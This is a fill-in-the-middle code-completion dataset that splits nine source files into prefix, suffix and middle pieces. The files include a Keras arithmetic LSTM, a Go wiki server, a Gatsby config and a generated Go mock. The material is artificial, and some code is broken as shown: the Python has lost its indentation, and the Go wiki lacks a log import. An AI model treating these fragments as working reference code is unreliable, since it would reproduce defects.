file_name | prefix | suffix | middle |
---|---|---|---|
addition-subtractor.py |
# coding: utf-8
from keras.models import Sequential
from keras import layers
import numpy as np
import matplotlib.pyplot as plt
from six.moves import range
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_size', default='45000')
parser.add_argument('--train_size', default='40000')
parser.add_argument('--digits', default='3')
parser.add_argument('--epoch', default='2')
parser.add_argument('--activation', default='softmax')
parser.add_argument('--output_name', default='model_1')
args = parser.parse_args()
# # Parameters Config
class colors:
|
DATA_SIZE = int(args.data_size)
TRAIN_SIZE = int(args.train_size)
DIGITS = int(args.digits)
REVERSE = False
MAXLEN = DIGITS + 1 + DIGITS
chars = '0123456789+- '
RNN = layers.LSTM
HIDDEN_SIZE = 128
BATCH_SIZE = 128
EPOCH_SIZE = int(args.epoch)
LAYERS = 1
ACTIVATION = args.activation
for d in ('./data', './models', './fig', './corpus'):
    os.makedirs(d, exist_ok=True)  # ensure output directories exist before writing
output_file = open('./data/as-' + args.output_name, 'w')
print('DATA_SIZE = ', DATA_SIZE , file=output_file)
print('TRAIN_SIZE = ', TRAIN_SIZE, file=output_file)
print('DIGITS = ', DIGITS, file=output_file)
print('EPOCH_SIZE = ', EPOCH_SIZE, file=output_file)
print('ACTIVATION = ', ACTIVATION, file=output_file)
class CharacterTable(object):
def __init__(self, chars):
self.chars = sorted(set(chars))
self.char_indices = dict((c, i) for i, c in enumerate(self.chars))
self.indices_char = dict((i, c) for i, c in enumerate(self.chars))
def encode(self, C, num_rows):
x = np.zeros((num_rows, len(self.chars)))
for i, c in enumerate(C):
x[i, self.char_indices[c]] = 1
return x
def decode(self, x, calc_argmax=True):
if calc_argmax:
x = x.argmax(axis=-1)
return "".join(self.indices_char[i] for i in x)
ctable = CharacterTable(chars)
ctable.indices_char
# # Data Generation
questions = []
expected = []
seen = set()
print('Generating data...')
while len(questions) < DATA_SIZE:
f = lambda: int(''.join(np.random.choice(list('0123456789')) for i in range(np.random.randint(1, DIGITS + 1))))
a, b = f(), f()
if len(questions) % 2 == 0:
q = '{}-{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a - b)
else:
q = '{}+{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a + b)
if q in seen:
continue
seen.add(q)
ans += ' ' * (DIGITS + 1 - len(ans))
if REVERSE:
query = query[::-1]
questions.append(query)
expected.append(ans)
print('Total questions:', len(questions))
print(questions[:5], expected[:5])
# # Processing
print('Vectorization... (to the one-hot encoding)')
x = np.zeros((len(questions), MAXLEN, len(chars)), dtype=bool)
y = np.zeros((len(expected), DIGITS + 1, len(chars)), dtype=bool)
for i, sentence in enumerate(questions):
x[i] = ctable.encode(sentence, MAXLEN)
for i, sentence in enumerate(expected):
y[i] = ctable.encode(sentence, DIGITS + 1)
indices = np.arange(len(y))
np.random.shuffle(indices)
print(indices)
x = x[indices]
y = y[indices]
# train_test_split
train_x = x[:TRAIN_SIZE]
train_y = y[:TRAIN_SIZE]
test_x = x[TRAIN_SIZE:]
test_y = y[TRAIN_SIZE:]
print('Training Data:')
print(train_x.shape)
print(train_y.shape)
split_at = len(train_x) - len(train_x) // 10
print('split_at', split_at)
(x_train, x_val) = train_x[:split_at], train_x[split_at:]
(y_train, y_val) = train_y[:split_at], train_y[split_at:]
print('Training Data:')
print(x_train.shape)
print(y_train.shape)
print('Validation Data:')
print(x_val.shape)
print(y_val.shape)
print('Testing Data:')
print(test_x.shape)
print(test_y.shape)
print("input: ", x_train[:3], '\n\n', "label: ", y_train[:3])
# # Build Model
print('Build model...')
model = Sequential()
model.add(RNN(HIDDEN_SIZE, input_shape=(MAXLEN, len(chars))))
model.add(layers.RepeatVector(DIGITS + 1))
for _ in range(LAYERS):
model.add(RNN(HIDDEN_SIZE, return_sequences=True))
model.add(layers.TimeDistributed(layers.Dense(len(chars))))
model.add(layers.Activation(ACTIVATION))
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
print('train set = ', x_train.shape, 'validation set = ', x_val.shape, file=output_file)
acc = []
val_acc = []
loss = []
val_loss = []
# # Training
for loop in range(100):
print()
print('-' * 50)
print('Train Loop Num:', loop)
history = model.fit(x_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCH_SIZE,
validation_data=(x_val, y_val),
shuffle=True)
acc += history.history['acc']
val_acc += history.history['val_acc']
loss += history.history['loss']
val_loss += history.history['val_loss']
print('loop ', loop, file=output_file)
print('acc = {} '.format(history.history['acc']), end='', file=output_file)
print('val_acc = {} '.format(history.history['val_acc']), end='', file=output_file)
print('loss = {} '.format(history.history['loss']), end='', file=output_file)
print('val_loss = {} '.format(history.history['val_loss']), file=output_file)
print('-' * 50 , file=output_file)
for i in range(10):
ind = np.random.randint(0, len(x_val))
rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])]
preds = model.predict_classes(rowx, verbose=0)
q = ctable.decode(rowx[0])
correct = ctable.decode(rowy[0])
guess = ctable.decode(preds[0], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
# # Testing
print("MSG : Prediction")
print("-" * 50)
right = 0
preds = model.predict_classes(test_x, verbose=0)
for i in range(len(preds)):
q = ctable.decode(test_x[i])
correct = ctable.decode(test_y[i])
guess = ctable.decode(preds[i], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
right += 1
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
print("MSG : Accuracy is {}".format(right / len(preds)))
print("MSG : Accuracy is {}".format(right / len(preds)), file=output_file)
model.save('./models/as-' + args.output_name + '.h5')
with open('./corpus/as-' + args.output_name + '-training-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_train, y_train):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-validation-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_val, y_val):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-testing-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(test_x, test_y):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
plt.plot(acc)
plt.plot(val_acc)
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.savefig('./fig/as-accuracy-' + args.output_name + '.png')
plt.clf()
# summarize history for loss
plt.plot(loss)
plt.plot(val_loss)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.savefig('./fig/as-loss-' + args.output_name + '.png')
output_file.close()
plt.clf()
| ok = '\033[92m'
fail = '\033[91m'
close = '\033[0m' |
copy.py | #!/usr/bin/env python
from actions.action import Action
import os
import contextlib
import re
import shutil
__author__ = "Ryan Sheffer"
__copyright__ = "Copyright 2020, Sheffer Online Services"
__credits__ = ["Ryan Sheffer", "VREAL"]
class Copy(Action):
"""
Copy Action
An action designed to copy file/s as part of a build process.
TODO: Setup wildcard like copying? Take advantage of a copy module with a lot of options.
TODO: Have many copying options, like many files in a folder to another folder. Whole dir trees, etc.
"""
def __init__(self, config, **kwargs):
super().__init__(config, **kwargs)
self.copy_items = kwargs.get('copy', [])
def verify(self):
if not self.copy_items:
return 'No items to copy!'
for item in self.copy_items:
if type(item) is not list or len(item) != 2:
return 'Invalid copy item found in copy list!'
item[0] = self.replace_tags(item[0])
item[1] = self.replace_tags(item[1])
if not os.path.isfile(item[0]):
return 'Copy item ({}) does not exist!'.format(item[0])
return ''
def run(self):
|
if __name__ == "__main__":
class VarClassTest(object):
def __init__(self):
self.HI2_there = "some\\cool\\path"
self.three = "another\\cool\\path"
print(Copy.replace_path_sections('hello\\{HI2_there}\\then\\there\\were\\{three}\\bla.exe', VarClassTest()))
print(Copy.replace_path_sections('hello\\then\\there\\{not_found}\\three.exe', VarClassTest()))
| for item in self.copy_items:
with contextlib.suppress(FileNotFoundError):
os.unlink(item[1])
os.makedirs(os.path.dirname(item[1]), exist_ok=True)
print('Copying {} to {}'.format(item[0], item[1]))
shutil.copy2(item[0], item[1])
return True |
helpers.rs | use derivative::Derivative;
use pest::Span;
pub(crate) fn span_into_str(span: Span) -> &str {
span.as_str()
}
pub(crate) fn span_into_bool(span: Span) -> bool {
    span_into_str(span) == "True"
}
pub(crate) fn parse_u64(span: Span) -> u64 {
let input = span.as_str();
input
.parse()
.map_err(|e| {
log::error!("Failed to read `{}` as u64: {}", input, e);
e
}) | #[derivative(Debug = "transparent")]
pub struct Debug<'src> {
pub content: &'src str,
}
impl<'a> ::from_pest::FromPest<'a> for Debug<'a> {
type Rule = crate::xkb::Rule;
type FatalError = ::from_pest::Void;
fn from_pest(
pest: &mut ::from_pest::pest::iterators::Pairs<'a, Self::Rule>,
) -> ::std::result::Result<Self, ::from_pest::ConversionError<::from_pest::Void>> {
let mut clone = pest.clone();
let pair = clone.next().ok_or(::from_pest::ConversionError::NoMatch)?;
*pest = clone;
Ok(Debug { content: pair.as_str() })
}
} | .unwrap()
}
#[derive(Derivative, Clone, PartialEq)] |
cy.js | FullCalendar.globalLocales.push(function () {
'use strict';
var cy = {
code: 'cy',
week: {
dow: 1, // Monday is the first day of the week.
doy: 4, // The week that contains Jan 4th is the first week of the year.
},
buttonText: {
prev: 'Blaenorol',
next: 'Nesaf',
today: 'Heddiw',
year: 'Blwyddyn',
month: 'Mis',
week: 'Wythnos',
day: 'Dydd',
list: 'Rhestr', | weekText: 'Wythnos',
allDayText: 'Trwy\'r dydd',
moreLinkText: 'Mwy',
noEventsText: 'Dim digwyddiadau',
};
return cy;
}());
| }, |
login.module.ts | import { NgModule } from "@angular/core";
import { CommonModule } from "@angular/common";
import { FormsModule, ReactiveFormsModule } from "@angular/forms";
import { LoginComponent } from "./login.component";
import { HttpClientModule } from "@angular/common/http";
import { RouterModule } from "@angular/router";
@NgModule({
declarations: [LoginComponent],
imports: [CommonModule, FormsModule, HttpClientModule, ReactiveFormsModule],
exports: [LoginComponent],
})
export class LoginModule {} | ||
wiki.go | package main
import (
"./dao"
"./models"
"fmt"
"gopkg.in/mgo.v2/bson"
"html/template"
"net/http"
"regexp"
)
var templates = template.Must(template.ParseFiles("tmpl/view.html", "tmpl/edit.html", "tmpl/list.html"))
var validPath = regexp.MustCompile("^/(edit|save|view)/([a-zA-Z0-9]+)$")
var validListPath = regexp.MustCompile("^/(list)(/)?$")
var wikiDao *dao.WikiDAO
func main() {
wikiDao = &dao.WikiDAO{Server: "127.0.0.1", Database: "gowiki"}
wikiDao.Connect()
http.HandleFunc("/", makeHandler(listHandler))
http.HandleFunc("/list/", makeHandler(listHandler))
http.HandleFunc("/view/", makeHandler(viewHandler))
http.HandleFunc("/edit/", makeHandler(editHandler))
http.HandleFunc("/save/", makeHandler(saveHandler))
log.Fatal(http.ListenAndServe(":8080", nil))
}
func makeHandler(fn func(w http.ResponseWriter, r *http.Request, title string)) func(w http.ResponseWriter, p *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
if r.URL.Path == "/" {
r.URL.Path = "/list"
}
if validListPath.FindString(r.URL.Path) == r.URL.Path {
fn(w, r, "")
} else {
m := validPath.FindStringSubmatch(r.URL.Path)
if m == nil {
http.NotFound(w, r)
return
}
fn(w, r, m[2])
}
}
}
func listHandler(w http.ResponseWriter, r *http.Request, title string) {
pages, err := wikiDao.ListAllEntries()
if err != nil {
    http.NotFound(w, r)
    return
}
renderListTemplate(w, "list", pages)
}
func viewHandler(w http.ResponseWriter, r *http.Request, title string) {
p, err := wikiDao.LoadPage(title)
if err != nil {
    http.Redirect(w, r, "/edit/"+title, http.StatusFound)
    return
}
renderTemplate(w, "view", p)
}
func editHandler(w http.ResponseWriter, r *http.Request, title string) {
p, err := wikiDao.LoadPage(title)
if err != nil {
p = &models.Page{Title: title}
}
renderTemplate(w, "edit", p)
}
func saveHandler(w http.ResponseWriter, r *http.Request, title string) {
body := r.FormValue("body")
pageID := r.FormValue("id")
fmt.Printf("Page Id:%v\n", pageID)
var p *models.Page
var err error
p = &models.Page{Title: title, Body: []byte(body)}
if pageID == "" {
err = wikiDao.SavePage(p, true)
} else {
p.ID = bson.ObjectIdHex(pageID)
fmt.Printf("Page Id:%v\n", p.ID)
err = wikiDao.SavePage(p, false)
}
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
http.Redirect(w, r, "/view/"+title, http.StatusFound)
}
func renderTemplate(w http.ResponseWriter, tmpl string, p *models.Page) {
err := templates.ExecuteTemplate(w, tmpl+".html", p)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
func | (w http.ResponseWriter, tmpl string, p *[]models.Page) {
err := templates.ExecuteTemplate(w, tmpl+".html", p)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
| renderListTemplate |
gatsby-config.js | require('dotenv').config();
const TailwindExtractor = require('./utils/purgecss-tailwind-extractor');
const siteMetadata = {
title: 'Paralelná Polis Košice',
description:
'Paralelná Polis Košice je zameraná na vzdelávanie, objavovanie, tvorenie lepších systémov, experimentovanie a aplikáciu kryptomien a spojených technológií do bežného života. Je tu pre všetkých, ktorí majú záujem fungovať slobodnejšie a nezávislejšie.',
siteUrl: 'https://www.paralelnapoliskosice.sk',
image: '/ppke-temp.jpg',
email: '[email protected]',
social: {
facebook: 'https://www.facebook.com/paralelnapoliske',
github: 'https://github.com/ParalelnaPolisKE',
instagram: 'https://www.instagram.com/paralelnapoliske',
youtube: 'https://www.youtube.com/channel/UCC90ybnmSHgleXJaWPces9g',
twitter: 'https://twitter.com/parallelpoliske',
rss: '/blog/rss.xml',
},
crypto: {
BTC: '1KGB5uxAZrFYrHKsydLvfhwT4VULE1tunA',
LTC: 'Lha1KBxm5wgtTEJdk1tyBhWgAuxJ2zV9zX',
XMR:
'49XCoar5nDSiz3QfSa25jyJ5KJSc95pkpS8YXWVoB3TY8LDVjEjhUoZRRQL5sidfLB6cUWnxH2Tv5VbGKzxxieJqQPPHuea',
ETH: '0x610825C5DFcbc72E284E5a5F381f4fd728263706',
ETC: '0x1934945354BDe5b34F0c68E6AA78492050856D38',
},
nodes: {
BTC: {
mainnet: {
url: "btc.ppke.sk",
port: ""
}
},
LTC: {
mainnet: {
url: "ltc.ppke.sk",
port: ""
}
},
XMR: {
mainnet: {
url: "xmr.ppke.sk",
port: "18081"
}
},
},
facebookAppID: '2127644397453206',
mailchimpUrl:
'https://paralelnapoliskosice.us19.list-manage.com/subscribe/post?u=8affbd08463d07e25a8bbcca4&id=b02c302d92',
joinUsFormAction:
'https://briskforms.com/go/410d7fbf05f2283f04c8a02e86b531be',
};
const plugins = [
{
resolve: 'gatsby-plugin-feed',
options: {
feeds: [
{
serialize: ({ query: { site, allMarkdownRemark } }) => {
return allMarkdownRemark.edges.map(({ node }) => {
return {
title: node.frontmatter.title,
description: node.excerpt,
url: `${site.siteMetadata.siteUrl}/blog${node.fields.slug}`,
guid: `${site.siteMetadata.siteUrl}/blog${node.fields.slug}`,
author: node.frontmatter.author.id,
custom_elements: [
{
pubDate: new Date(node.fields.date).toUTCString(),
},
],
};
});
},
setup: ({
query: {
site: { siteMetadata },
},
}) => {
return {
title: `${siteMetadata.title} - Blog`,
description: siteMetadata.description,
feed_url: siteMetadata.siteUrl + `/blog/rss.xml`,
site_url: siteMetadata.siteUrl,
};
},
query: `
{
allMarkdownRemark(
sort: { order: DESC, fields: [fields___date] }
) {
edges {
node {
excerpt
fields {
date
slug
}
frontmatter {
title
author {
id
}
}
}
}
}
}
`,
output: '/blog/rss.xml',
title: `${siteMetadata.title} - Blog`,
},
],
},
},
'gatsby-plugin-netlify-cms',
'gatsby-plugin-react-helmet',
'gatsby-plugin-remove-trailing-slashes',
'gatsby-transformer-json',
{
resolve: 'gatsby-source-filesystem',
options: {
name: 'data',
path: `${__dirname}/src/data`,
},
},
{
resolve: 'gatsby-source-filesystem',
options: {
name: 'assets',
path: `${__dirname}/static/assets`,
},
},
{
resolve: 'gatsby-source-filesystem',
options: {
name: 'posts',
path: `${__dirname}/src/pages/blog/`,
},
},
// 'gatsby-plugin-sitemap',
'gatsby-plugin-netlify-cms-paths',
'gatsby-plugin-sharp',
{
resolve: 'gatsby-transformer-remark',
options: {
plugins: [
'gatsby-plugin-netlify-cms-paths',
{
resolve: 'gatsby-remark-images',
options: {
linkImagesToOriginal: false,
maxWidth: 1200,
quality: 75,
},
},
{
resolve: 'gatsby-remark-autolink-headers',
options: {
removeAccents: true,
},
},
],
},
},
'gatsby-plugin-catch-links',
'gatsby-transformer-sharp',
{
resolve: 'gatsby-mdx',
options: {
defaultLayouts: {
default: require.resolve('./src/templates/page.jsx'),
},
},
},
{
resolve: 'gatsby-plugin-purgecss',
options: {
extractors: [
{
extractor: TailwindExtractor,
extensions: ['js', 'jsx'],
},
],
whitelist: ['___gatsby', 'ol', 'h2', 'h3'],
whitelistPatterns: [/^icon\-/, /^marker/],
},
},
{
resolve: 'gatsby-plugin-manifest',
options: {
name: 'Paralelná Polis Košice',
short_name: 'PPKE',
start_url: '/',
background_color: '#ffffff',
theme_color: '#000000',
display: 'standalone',
icons: [
{
src: `/android-chrome-192x192.png`,
sizes: `192x192`,
type: `image/png`,
},
{
src: `/android-chrome-512x512.png`,
sizes: `512x512`,
type: `image/png`,
},
],
},
},
// 'gatsby-plugin-offline', // Disabled as new content need hard refresh
'gatsby-plugin-remove-serviceworker',
// Disabled until FB API token resolved
// {
// resolve: `gatsby-source-facebook`,
// options: {
// places: ['782479115289415'], // Can be either a numeric ID or the URL ID
// params: {
// fields:
// 'events { id, name, description, start_time, end_time, place { id, name } }',
// },
// key: process.env.FACEBOOK_ACCESS_TOKEN,
// version: '7.0',
// },
// },
// Disabled until FB Instagram API works as expected again...
// {
// resolve: 'gatsby-source-instagram', | // },
// },
'gatsby-plugin-react-leaflet',
];
const mapping = {
'MarkdownRemark.frontmatter.author': 'AuthorJson',
};
/**
* Adds Google Analytics only to live production site
*
* `CONTEXT` comes from Netlify build process
* @see https://www.netlify.com/docs/continuous-deployment/#build-environment-variables
*/
if (process.env.CONTEXT === 'production') {
plugins.push({
resolve: 'gatsby-plugin-google-analytics',
options: {
trackingId: 'UA-124036846-1',
head: true,
respectDNT: true,
},
});
}
module.exports = {
pathPrefix: `/blog`,
siteMetadata,
plugins,
mapping,
}; | // options: {
// username: '7188082683', |
serviceAreaMetaData.js | // All material copyright ESRI, All Rights Reserved, unless otherwise specified.
// See https://js.arcgis.com/4.11/esri/copyright.txt for details. | //>>built
define(["require","exports"],function(b,c){return function(){return function(a){void 0===a&&(a=null);this.url="//route.arcgis.com/arcgis/rest/services/World/ServiceAreas/NAServer/ServiceArea_World/solveServiceArea";this.credentials=null;this.impedanceAttributeNames=[{serviceValue:"TravelTime",entryName:"traveltime"},{serviceValue:"TruckTravelTime",entryName:"trucktraveltime"},{serviceValue:"WalkTime",entryName:"walktime"},{serviceValue:"Miles",entryName:"miles"},{serviceValue:"Kilometers",entryName:"kilometers"}];
this.defaultImpledanceAttributeName="TravelTime";this.credentials=a}}()}); |
|
zz_generated_user_attribute_mock.go | // Code generated by moq; DO NOT EDIT.
// github.com/matryer/moq
package fakes
import (
context "context"
sync "sync"
controller "github.com/rancher/norman/controller"
objectclient "github.com/rancher/norman/objectclient"
v3 "github.com/rancher/types/apis/management.cattle.io/v3"
v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
labels "k8s.io/apimachinery/pkg/labels"
watch "k8s.io/apimachinery/pkg/watch"
cache "k8s.io/client-go/tools/cache"
)
var (
lockUserAttributeListerMockGet sync.RWMutex
lockUserAttributeListerMockList sync.RWMutex
)
// Ensure, that UserAttributeListerMock does implement UserAttributeLister.
// If this is not the case, regenerate this file with moq.
var _ v3.UserAttributeLister = &UserAttributeListerMock{}
// UserAttributeListerMock is a mock implementation of UserAttributeLister.
//
// func TestSomethingThatUsesUserAttributeLister(t *testing.T) {
//
// // make and configure a mocked UserAttributeLister
// mockedUserAttributeLister := &UserAttributeListerMock{
// GetFunc: func(namespace string, name string) (*v3.UserAttribute, error) {
// panic("mock out the Get method")
// },
// ListFunc: func(namespace string, selector labels.Selector) ([]*v3.UserAttribute, error) {
// panic("mock out the List method")
// },
// }
//
// // use mockedUserAttributeLister in code that requires UserAttributeLister
// // and then make assertions.
//
// }
type UserAttributeListerMock struct {
// GetFunc mocks the Get method.
GetFunc func(namespace string, name string) (*v3.UserAttribute, error)
// ListFunc mocks the List method.
ListFunc func(namespace string, selector labels.Selector) ([]*v3.UserAttribute, error)
// calls tracks calls to the methods.
calls struct {
// Get holds details about calls to the Get method.
Get []struct {
// Namespace is the namespace argument value.
Namespace string
// Name is the name argument value.
Name string
}
// List holds details about calls to the List method.
List []struct {
// Namespace is the namespace argument value.
Namespace string | }
}
// Get calls GetFunc.
func (mock *UserAttributeListerMock) Get(namespace string, name string) (*v3.UserAttribute, error) {
if mock.GetFunc == nil {
panic("UserAttributeListerMock.GetFunc: method is nil but UserAttributeLister.Get was just called")
}
callInfo := struct {
Namespace string
Name string
}{
Namespace: namespace,
Name: name,
}
lockUserAttributeListerMockGet.Lock()
mock.calls.Get = append(mock.calls.Get, callInfo)
lockUserAttributeListerMockGet.Unlock()
return mock.GetFunc(namespace, name)
}
// GetCalls gets all the calls that were made to Get.
// Check the length with:
// len(mockedUserAttributeLister.GetCalls())
func (mock *UserAttributeListerMock) GetCalls() []struct {
Namespace string
Name string
} {
var calls []struct {
Namespace string
Name string
}
lockUserAttributeListerMockGet.RLock()
calls = mock.calls.Get
lockUserAttributeListerMockGet.RUnlock()
return calls
}
// List calls ListFunc.
func (mock *UserAttributeListerMock) List(namespace string, selector labels.Selector) ([]*v3.UserAttribute, error) {
if mock.ListFunc == nil {
panic("UserAttributeListerMock.ListFunc: method is nil but UserAttributeLister.List was just called")
}
callInfo := struct {
Namespace string
Selector labels.Selector
}{
Namespace: namespace,
Selector: selector,
}
lockUserAttributeListerMockList.Lock()
mock.calls.List = append(mock.calls.List, callInfo)
lockUserAttributeListerMockList.Unlock()
return mock.ListFunc(namespace, selector)
}
// ListCalls gets all the calls that were made to List.
// Check the length with:
// len(mockedUserAttributeLister.ListCalls())
func (mock *UserAttributeListerMock) ListCalls() []struct {
Namespace string
Selector labels.Selector
} {
var calls []struct {
Namespace string
Selector labels.Selector
}
lockUserAttributeListerMockList.RLock()
calls = mock.calls.List
lockUserAttributeListerMockList.RUnlock()
return calls
}
var (
lockUserAttributeControllerMockAddClusterScopedHandler sync.RWMutex
lockUserAttributeControllerMockAddHandler sync.RWMutex
lockUserAttributeControllerMockEnqueue sync.RWMutex
lockUserAttributeControllerMockGeneric sync.RWMutex
lockUserAttributeControllerMockInformer sync.RWMutex
lockUserAttributeControllerMockLister sync.RWMutex
lockUserAttributeControllerMockStart sync.RWMutex
lockUserAttributeControllerMockSync sync.RWMutex
)
// Ensure, that UserAttributeControllerMock does implement UserAttributeController.
// If this is not the case, regenerate this file with moq.
var _ v3.UserAttributeController = &UserAttributeControllerMock{}
// UserAttributeControllerMock is a mock implementation of UserAttributeController.
//
// func TestSomethingThatUsesUserAttributeController(t *testing.T) {
//
// // make and configure a mocked UserAttributeController
// mockedUserAttributeController := &UserAttributeControllerMock{
// AddClusterScopedHandlerFunc: func(ctx context.Context, name string, clusterName string, handler v3.UserAttributeHandlerFunc) {
// panic("mock out the AddClusterScopedHandler method")
// },
// AddHandlerFunc: func(ctx context.Context, name string, handler v3.UserAttributeHandlerFunc) {
// panic("mock out the AddHandler method")
// },
// EnqueueFunc: func(namespace string, name string) {
// panic("mock out the Enqueue method")
// },
// GenericFunc: func() controller.GenericController {
// panic("mock out the Generic method")
// },
// InformerFunc: func() cache.SharedIndexInformer {
// panic("mock out the Informer method")
// },
// ListerFunc: func() v3.UserAttributeLister {
// panic("mock out the Lister method")
// },
// StartFunc: func(ctx context.Context, threadiness int) error {
// panic("mock out the Start method")
// },
// SyncFunc: func(ctx context.Context) error {
// panic("mock out the Sync method")
// },
// }
//
// // use mockedUserAttributeController in code that requires UserAttributeController
// // and then make assertions.
//
// }
type UserAttributeControllerMock struct {
// AddClusterScopedHandlerFunc mocks the AddClusterScopedHandler method.
AddClusterScopedHandlerFunc func(ctx context.Context, name string, clusterName string, handler v3.UserAttributeHandlerFunc)
// AddHandlerFunc mocks the AddHandler method.
AddHandlerFunc func(ctx context.Context, name string, handler v3.UserAttributeHandlerFunc)
// EnqueueFunc mocks the Enqueue method.
EnqueueFunc func(namespace string, name string)
// GenericFunc mocks the Generic method.
GenericFunc func() controller.GenericController
// InformerFunc mocks the Informer method.
InformerFunc func() cache.SharedIndexInformer
// ListerFunc mocks the Lister method.
ListerFunc func() v3.UserAttributeLister
// StartFunc mocks the Start method.
StartFunc func(ctx context.Context, threadiness int) error
// SyncFunc mocks the Sync method.
SyncFunc func(ctx context.Context) error
// calls tracks calls to the methods.
calls struct {
// AddClusterScopedHandler holds details about calls to the AddClusterScopedHandler method.
AddClusterScopedHandler []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// ClusterName is the clusterName argument value.
ClusterName string
// Handler is the handler argument value.
Handler v3.UserAttributeHandlerFunc
}
// AddHandler holds details about calls to the AddHandler method.
AddHandler []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// Handler is the handler argument value.
Handler v3.UserAttributeHandlerFunc
}
// Enqueue holds details about calls to the Enqueue method.
Enqueue []struct {
// Namespace is the namespace argument value.
Namespace string
// Name is the name argument value.
Name string
}
// Generic holds details about calls to the Generic method.
Generic []struct {
}
// Informer holds details about calls to the Informer method.
Informer []struct {
}
// Lister holds details about calls to the Lister method.
Lister []struct {
}
// Start holds details about calls to the Start method.
Start []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Threadiness is the threadiness argument value.
Threadiness int
}
// Sync holds details about calls to the Sync method.
Sync []struct {
// Ctx is the ctx argument value.
Ctx context.Context
}
}
}
// AddClusterScopedHandler calls AddClusterScopedHandlerFunc.
func (mock *UserAttributeControllerMock) AddClusterScopedHandler(ctx context.Context, name string, clusterName string, handler v3.UserAttributeHandlerFunc) {
if mock.AddClusterScopedHandlerFunc == nil {
panic("UserAttributeControllerMock.AddClusterScopedHandlerFunc: method is nil but UserAttributeController.AddClusterScopedHandler was just called")
}
callInfo := struct {
Ctx context.Context
Name string
ClusterName string
Handler v3.UserAttributeHandlerFunc
}{
Ctx: ctx,
Name: name,
ClusterName: clusterName,
Handler: handler,
}
lockUserAttributeControllerMockAddClusterScopedHandler.Lock()
mock.calls.AddClusterScopedHandler = append(mock.calls.AddClusterScopedHandler, callInfo)
lockUserAttributeControllerMockAddClusterScopedHandler.Unlock()
mock.AddClusterScopedHandlerFunc(ctx, name, clusterName, handler)
}
// AddClusterScopedHandlerCalls gets all the calls that were made to AddClusterScopedHandler.
// Check the length with:
// len(mockedUserAttributeController.AddClusterScopedHandlerCalls())
func (mock *UserAttributeControllerMock) AddClusterScopedHandlerCalls() []struct {
Ctx context.Context
Name string
ClusterName string
Handler v3.UserAttributeHandlerFunc
} {
var calls []struct {
Ctx context.Context
Name string
ClusterName string
Handler v3.UserAttributeHandlerFunc
}
lockUserAttributeControllerMockAddClusterScopedHandler.RLock()
calls = mock.calls.AddClusterScopedHandler
lockUserAttributeControllerMockAddClusterScopedHandler.RUnlock()
return calls
}
// AddHandler calls AddHandlerFunc.
func (mock *UserAttributeControllerMock) AddHandler(ctx context.Context, name string, handler v3.UserAttributeHandlerFunc) {
if mock.AddHandlerFunc == nil {
panic("UserAttributeControllerMock.AddHandlerFunc: method is nil but UserAttributeController.AddHandler was just called")
}
callInfo := struct {
Ctx context.Context
Name string
Handler v3.UserAttributeHandlerFunc
}{
Ctx: ctx,
Name: name,
Handler: handler,
}
lockUserAttributeControllerMockAddHandler.Lock()
mock.calls.AddHandler = append(mock.calls.AddHandler, callInfo)
lockUserAttributeControllerMockAddHandler.Unlock()
mock.AddHandlerFunc(ctx, name, handler)
}
// AddHandlerCalls gets all the calls that were made to AddHandler.
// Check the length with:
// len(mockedUserAttributeController.AddHandlerCalls())
func (mock *UserAttributeControllerMock) AddHandlerCalls() []struct {
Ctx context.Context
Name string
Handler v3.UserAttributeHandlerFunc
} {
var calls []struct {
Ctx context.Context
Name string
Handler v3.UserAttributeHandlerFunc
}
lockUserAttributeControllerMockAddHandler.RLock()
calls = mock.calls.AddHandler
lockUserAttributeControllerMockAddHandler.RUnlock()
return calls
}
// Enqueue calls EnqueueFunc.
func (mock *UserAttributeControllerMock) Enqueue(namespace string, name string) {
if mock.EnqueueFunc == nil {
panic("UserAttributeControllerMock.EnqueueFunc: method is nil but UserAttributeController.Enqueue was just called")
}
callInfo := struct {
Namespace string
Name string
}{
Namespace: namespace,
Name: name,
}
lockUserAttributeControllerMockEnqueue.Lock()
mock.calls.Enqueue = append(mock.calls.Enqueue, callInfo)
lockUserAttributeControllerMockEnqueue.Unlock()
mock.EnqueueFunc(namespace, name)
}
// EnqueueCalls gets all the calls that were made to Enqueue.
// Check the length with:
// len(mockedUserAttributeController.EnqueueCalls())
func (mock *UserAttributeControllerMock) EnqueueCalls() []struct {
Namespace string
Name string
} {
var calls []struct {
Namespace string
Name string
}
lockUserAttributeControllerMockEnqueue.RLock()
calls = mock.calls.Enqueue
